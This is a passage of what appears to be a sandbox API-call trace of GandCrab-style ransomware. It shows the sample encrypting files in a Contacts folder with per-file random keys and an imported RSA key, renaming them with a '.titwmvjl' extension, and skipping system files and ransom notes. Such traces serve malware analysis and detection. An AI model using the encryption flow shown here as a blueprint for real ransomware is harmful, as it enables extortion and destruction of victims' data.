phProv=0x259f3a0*=0x4c9980) returned 1 [0086.977] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.977] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.978] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.978] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0086.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.978] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.978] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.978] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0086.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.979] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0086.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.979] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0086.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.980] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0086.980] GetLastError () returned 0x0 [0086.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.980] CryptDestroyKey (hKey=0x5037f8) returned 1 [0086.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.980] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.980] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0086.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.981] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5033b8) returned 1 [0086.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.982] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0086.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.982] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0086.982] GetLastError () returned 0x0 [0086.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.982] CryptDestroyKey (hKey=0x5033b8) returned 1 [0086.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.982] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.982] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.983] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.983] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x493, lpOverlapped=0x0) returned 1 [0086.995] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.995] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x493, lpOverlapped=0x0) returned 1 [0087.050] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.050] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.051] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.055] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.055] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.055] CloseHandle (hObject=0x2ac) returned 1 [0087.056] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\asdlfk poopvy.contact.titwmvjl"), dwFlags=0x1) returned 1 [0087.057] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.057] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.057] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2=".") returned 1 [0087.057] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2="..") returned 1 [0087.057] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="chucu jadnvk.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact" [0087.057] lstrlenW (lpString=".titwmvjl") returned 9 [0087.057] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0087.057] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.057] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact.titwmvjl") returned 60 [0087.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0087.058] lstrlenW (lpString=".contact") returned 8 [0087.058] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.058] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".contact ") returned 9 [0087.058] lstrcmpiW (lpString1=".contact", lpString2=".titwmvjl") returned -1 [0087.058] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0087.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="desktop.ini") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="autorun.inf") returned 1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="iconcache.db") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="bootsect.bak") returned 1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="boot.ini") returned 1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat.log") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="thumbs.db") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="KRAB-DECRYPT.html") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="CRAB-DECRYPT.html") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntldr") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="NTDETECT.COM") returned -1 [0087.058] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Bootfont.bin") returned 1 [0087.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0087.058] lstrlenW (lpString=".contact") returned 8 [0087.058] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.059] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".contact ") returned 9 [0087.059] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.059] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.059] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.059] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.060] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.106] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.106] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.107] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.108] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.108] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.108] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.108] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.108] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.108] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.110] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.110] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.110] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.110] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.110] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.110] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.111] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.112] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0087.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.112] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.113] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.113] GetLastError () returned 0x0 [0087.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.113] CryptDestroyKey (hKey=0x5032f8) returned 1 [0087.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.113] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.113] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.115] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0087.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.115] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.115] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.115] GetLastError () returned 0x0 [0087.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.116] CryptDestroyKey (hKey=0x5038f8) returned 1 [0087.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.116] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.116] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.116] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.116] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x499, lpOverlapped=0x0) returned 1 [0087.129] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.129] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x499, lpOverlapped=0x0) returned 1 [0087.130] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.130] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.131] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.135] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.135] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.135] CloseHandle (hObject=0x2ac) returned 1 [0087.136] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\chucu jadnvk.contact.titwmvjl"), dwFlags=0x1) returned 1 [0087.136] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.137] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.137] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0087.137] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0087.137] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock" [0087.137] lstrlenW (lpString=".titwmvjl") returned 9 [0087.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock") returned 55 [0087.137] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.137] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 64 [0087.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock") returned 55 [0087.137] lstrlenW (lpString=".lock") returned 5 [0087.137] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.137] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0087.137] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.137] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.138] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.138] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0087.138] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0087.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini" [0087.138] lstrlenW (lpString=".titwmvjl") returned 9 [0087.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0087.138] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.138] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini.titwmvjl") returned 51 [0087.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0087.138] lstrlenW (lpString=".ini") returned 4 [0087.138] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.138] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0087.138] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0087.138] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0087.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0087.139] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0087.139] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.139] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.139] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2=".") returned 1 [0087.139] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2="..") returned 1 [0087.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="lulcit amkdfe.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact" [0087.139] lstrlenW (lpString=".titwmvjl") returned 9 [0087.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0087.139] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.139] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact.titwmvjl") returned 61 [0087.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0087.139] lstrlenW (lpString=".contact") returned 8 [0087.139] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.139] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".contact ") returned 9 [0087.139] lstrcmpiW (lpString1=".contact", lpString2=".titwmvjl") returned -1 [0087.139] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0087.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="desktop.ini") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="autorun.inf") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="iconcache.db") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="bootsect.bak") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="boot.ini") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat.log") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="thumbs.db") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="KRAB-DECRYPT.html") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="CRAB-DECRYPT.html") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="KRAB-DECRYPT.txt") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="CRAB-DECRYPT.txt") returned 1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntldr") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="NTDETECT.COM") returned -1 [0087.140] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Bootfont.bin") returned 1 [0087.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0087.140] lstrlenW (lpString=".contact") returned 8 [0087.140] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.140] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".contact ") returned 9 [0087.140] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.140] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.140] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.141] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.141] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.148] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.148] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.148] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.149] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.149] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.149] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.149] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.149] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.150] VirtualFree (lpAddress=0x2420000, dwSize=0x0, 